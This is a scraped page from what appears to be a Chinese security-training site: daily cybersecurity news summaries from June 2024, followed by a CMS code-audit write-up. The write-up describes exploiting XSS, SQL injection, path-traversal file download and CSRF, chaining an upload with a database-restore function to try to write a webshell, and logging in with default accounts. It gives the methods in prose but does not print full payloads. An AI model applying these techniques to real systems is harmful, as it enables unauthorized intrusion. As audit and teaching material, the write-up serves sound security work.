https://support.apple.com/en-us/106340Apple发布AirPods的固件更新修补可能会允许恶意行为体以未经授权的方式访问耳机的安全漏洞,该安全问题编号为CVE-2024-27867,影响AirPods(第二代及更新版本)、AirPods Pro(所有型号)、AirPods Max、Powerbeats Pro和Beats Fit Pro等产品。当你的耳机正在向之前配对的设备之一发出连接请求时,蓝牙范围内的攻击者可能会伪造预期的源设备并获取你耳机的访问权限。换句话说,物理距离较近的对手可以利用此漏洞窃听私人谈话。
6、GitLab安全更新补丁修复了14个漏洞
https://www.securityweek.com/gitlab-security-updates-patch-14-vulnerabilities/GitLab 周三宣布了针对 GitLab 社区版(CE)和企业版(EE)的安全补丁,修复了 14 个漏洞,包括一个严重漏洞和三个高严重漏洞。
7、Vanna AI 中的提示注入漏洞导致数据库遭受RCE攻击
https://thehackernews.com/2024/06/prompt-injection-flaw-in-vanna-ai.html网络安全研究人员披露了 Vanna.AI 库中的一个高严重性安全漏洞,该漏洞可被利用通过提示注入技术实现远程代码执行漏洞。
8、南非国家卫生实验室遭遇勒索软件攻击
https://therecord.media/south-africa-lab-ransomware-mpox-outbreakNHLS 在南非各地运营着 265 个实验室,为南非九个省的公共医疗机构提供检测服务。发言人拒绝透露此次事件的幕后黑手是哪个勒索软件组织,也拒绝透露是否需要支付赎金。
9、P2PInfect僵尸网络向受控节点分发勒索软件模块
https://www.cadosecurity.com/blog/from-dormant-to-dangerous-p2pinfect-evolves-to-deploy-new-ransomware-and-cryptominer原本潜伏的、动机不明的点对点恶意软件僵尸网络P2PInfect最近开始变得活跃起来,在对Redis服务器的攻击中部署了勒索软件模块和加密矿工,研究人员声称有证据表明该恶意软件以“雇佣僵尸网络”的形式运行。从2024年5月16日开始,感染P2PInfect的设备开始收到从指定URL下载并运行勒索软件负载(rsagen)的指令,该命令有效期至2024年12月17日,
10、影响 Linux内核的UAF零日漏洞在暗网出售,售价15万美元
https://www.freebuf.com/news/404615.html一个恶意行为者在著名的暗网论坛 BreachForum 上宣布出售影响 Linux 内核的(UAF)零日漏洞。该漏洞允许低权限用户执行高权限代码,对受影响系统构成严重威胁。漏洞利用者指出该漏洞影响 6.6.15 - amd64 版本的 Linux 内核。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月27日
1、新型Medusa安卓木马针对欧美7国银行用户
https://www.cleafy.com/cleafy-labs/medusa-reborn-a-new-compact-variant-discovered 研究人员发现一款名为Medusa(又名TangleBot)的针对Android系统的复杂银行木马,该木马的最新版本仅需要轻量级的权限集以逃避检测,具有读取短信、记录按键、截取屏幕截图、记录通话、实时共享设备屏幕、执行未经授权的资金转账、窃取银行凭证等功能。自2024年5月被发现以来,Medusa木马已用于攻击加拿大、法国、意大利、西班牙、土耳其、英国和美国的银行用户。
2、Polyfill供应链劫持攻击影响超11万个网站
https://sansec.io/research/polyfill-supply-chain-attack Polyfill是一个流行的JavaScript库,研究人员近期发现今年2月初,该代码库的官方域名被中国内容交付网络公司Funnull收购,并修改了JavaScript库(“polyfill.js”)的代码内容,导致代码库的用户被重定向到恶意和诈骗网站。已知超过110000个嵌入图书馆和电子商务的站点受到供应链攻击的影响,Polyfill项目的原创者Andrew Betts敦促网站的所有者立即将其删除。
3、Boolka组织通过SQLi攻击部署BMANAGER木马
https://www.group-ib.com/blog/boolka/ 研究人员发现一个之前未被记录的名为Boolka的威胁行为体正在利用Web攻击脚本入侵网站,以传播代号为BMANAGER的模块化木马。该组织至少从2022年开始就一直在对各个国家的网站进行机会性SQL注入攻击,包括用恶意JavaScript脚本感染易受攻击的网站,这些脚本能够拦截在受感染网站上输入的任何数据,来获取凭证和其他个人信息等敏感详细信息。此外,攻击者还会将用户重定向到一个虚假的加载页面,提示受害者下载并安装BMANAGER木马程序。
4、奢侈品零售商Neiman Marcus遭数据泄露攻击
https://www.bleepingcomputer.com/news/security/neiman-marcus-confirms-data-breach-after-snowflake-account-hack/ 奢侈品零售商Neiman Marcus证实,黑客组织正在试图出售最近从该公司Snowflake账户中窃取的数据。在2024年4月至5月期间,未经授权的第三方获得了Neiman Marcus 集团使用的数据库平台的访问权限。根据调查,攻击者获取了存储在数据库平台中的某些个人信息,该公司表示,此次泄露影响了64472用户信息,包括姓名、联系信息、出生日期以及Neiman Ma
5、P2Pinfect 蠕虫正在向 Redis 服务器投放勒索软件
https://www.securityweek.com/p2pinfect-worm-now-dropping-ransomware-on-redis-servers/ Cado Security 报告称,P2Pinfect 是一种针对 Redis 服务器的点对点 (P2P) 蠕虫,最近进行了更新,以部署勒索软件和恶意挖矿。该蠕虫病毒以 Rust 编程语言编写,于 2023 年 7 月首次发现,并传播到受较旧的 Lua 沙箱逃逸漏洞 (CVE-2022-0543,CVSS 评分为 10) 影响的 Redis 服务器。
6、新的MOVEit Transfer漏洞已被威胁行为者织利用
https://www.securityweek.com/exploitation-attempts-target-new-moveit-transfer-vulnerability/ Progress Software 本周公开宣布了针对影响其 MOVEit Transfer 文件传输软件的两个严重身份验证绕过漏洞的补丁,其中一个漏洞已被发现遭到利用。Progress 于 6 月 25 日发布了单独的公告,告知客户有关CVE-2024-5805和CVE-2024-5806 的信息,这两个漏洞被描述为 MOVEit Transfer 产品的 SFTP 模块中存在的身份验证不当问题。攻击者可利
7、维基解密创始人朱利安·阿桑奇认罪后已获释
https://securityaffairs.com/164916/security/julian-assange-is-free.html 在贝尔马什监狱服刑五年后,维基解密创始人朱利安·阿桑奇终于重获自由,他已从英国获释,在北马里亚纳群岛的塞班岛出庭认罪,承认违反美国《间谍法》后获释,随后飞往澳大利亚,成为自由人。
8、Apple 修复 AirPods蓝牙漏洞,该漏洞可导致被窃听
https://thehackernews.com/2024/06/apple-patches-airpods-bluetooth.html Apple 发布了AirPods 的固件更新,这可能会允许恶意行为者以未经授权的方式访问耳机。该身份验证问题编号为 CVE-2024-27867,影响 AirPods(第二代及更新版本)、AirPods Pro(所有型号)、AirPods Max、Powerbeats Pro 和 Beats Fit Pro。
9、过去3年中有2.8 亿人安装了危险的Chrome扩展程序
https://www.techspot.com/news/103522-researchers-280-million-people-installed-malware-infected-chrome.html 据最新的报告,过去三年时间里,有 2.8 亿人安装了受恶意软件感染的 Chrome 浏览器扩展。但根据谷歌方面的数据,只有不到1%的扩展中存在恶意软件。
10、西门子电力自动化产品存在多个漏洞
https://sec-consult.com/vulnerability-lab/advisory/multiple-vulnerabilities-in-siemens-power-automation-products-cp-8000-cp-8021-cp8-022-cp-8031-cp-8050-sicore/ 西门子能源自动化产品中发现多个漏洞。信息可能通过未经身份验证的缓冲区覆盖而泄露。此外,通过缺少输入清理,可以实现经过身份验证的特权升级。攻击者能够通过硬件攻击或 shell 访问读取不安全存储的 MQTT 密码。
声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
记录一次CMS的代码审计
本次代码审计使用了白加黑的手法,用黑盒的视角测试功能点,用白盒的方式作为验证。
0x1 XSS
guestbook处,可以看到有一个留言板
idea搜索guestbook。发现代码如下,其中的getModel是获取数据的方法。Guestbook.class就是具体要获取的数据。
跟进Guestbook.class查看,发现GuestBook继承自BaseGuestbook
继续跟进BaseGuestbook可以发现http请求的数据,没有发现有过滤函数。
然后使用管理员登录后台查看留言,发现确实如我所想,存在xss漏洞。
ps:审计小技巧,开启sql日志然后一边打payload一边看记事本是否漏掉过滤哪些字符。这里是完全没有过滤,所以在出库的时候如果没有防护,基本上就是实锤xss了。
0x2 SQL注入
在产品中心发现有一个搜索框
看到源码,没有发现有过滤字符,这里采用之前开启的mysql日志,通过日志文件的sql语句判断是否有过滤。
直接输入单引号发现该cms返回500报错,很有可能存在sql注入。
于是使用两个单引号''使得系统不抛出异常,然后查看日志文件中发现sql语句没有过滤单引号,说明注入确实存在。
or 1 结果
or 0结果 注入确实存在
0x3 文件下载
/common/down路由中的file方法,直接获取http请求中的filekey参数,并且没有过滤../等关键字符。fileKey的值和PathKit.getWebRootPath()函数的返回值拼接。然后fileKey其实就是http中的参数。
ps:该路由不在前台,只能通过白盒的方式去进行,但是后续通过github上的fuzz字典发现也可以fuzz得到但是fuzz发包数量巨大不作为参考。但是日后如果实在挖不出洞,可以考虑多fuzz一下,也许就出货了也说不准。这里用的字典较大,其实可以考虑小一些的字典,算是个人的一些挖洞经验吧。
参数的fuzz
0x4 csrf
在系统管理-> 系统用户 -> 添加用户处,抓包然后使用burp生成csrf poc
保存至html后,点击submit request
可以看到用户被成功添加了
0x5 组合拳+sql备份getshell未果(条件较为苛刻)
这里是想getshell来着,毕竟都白盒了,当然能getshell就getshell,不能getshell就想办法getshell了。这里是发现后台上传接口,过滤了jsp,jspx文件名。
发现公司管理->基础内容->公司信息有上传图片
上传jsp文件,jspx文件均被拦截。
然后发现系统管理->数据库管理处发现可以进行数据库备份还原操作。在数据库还原抓包,发现是一个sql文件名字。这里想到之前的任意文件下载,那么岂不是可以通过上传一个sql文件,然后通过备份这个sql文件进行数据库备份getshell。
首先去下载备份好的sql文件,路径在static/back/文件名
然后添加getshell的payload
然后上传该sql文件,注意需要改后缀名为png
然后sql备份处填写上文件名,使用../让系统跨目录读取png图片
然后查看payload上的1.jsp是否成功生成。
访问的时候失败了,无法解析jsp,jspx等文件,但是服务器确实有写入了jsp文件
得到了两个前置条件
需要知道系统的绝对路径
系统下得开启其他能够解析的应用(如另外一个java系统在其他端口上,但是能够解析jsp,就可以通过该cms的漏洞在其他系统上写webshell,也算是一个任意文件写入,做到了"隔山打牛")
0x6 默认密码
一个比较容易忽略的点,通常admin的默认密码管理员基本都会在部署网站之后马上修改,但是如果类似有几个账户的情况下,管理员可能会忽略掉其他用户的默认密码。这里可以直接看sql文件。在其sql文件下发现有两个默认账号一个是admin,一个是read。
read登录成功
0x7 总结
本次代码审计强化学习了白+黑的方式,更加简单的找出了漏洞,有些地方还欠缺一些思路,比如0x5rce那一块,想着是不是可以写一个class文件达到rce的效果。或者覆盖掉原本的xml文件之类的操作,不允许上传jsp,jspx文件是否可以通过上传war包来进行getshell。总之觉得还有诸多不足,篇幅关系记录到这。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页
蚁景网安学院火热招生中,限时领取大额优惠券,快来抢购吧~
扫码咨询客服了解招生最新内容和活动

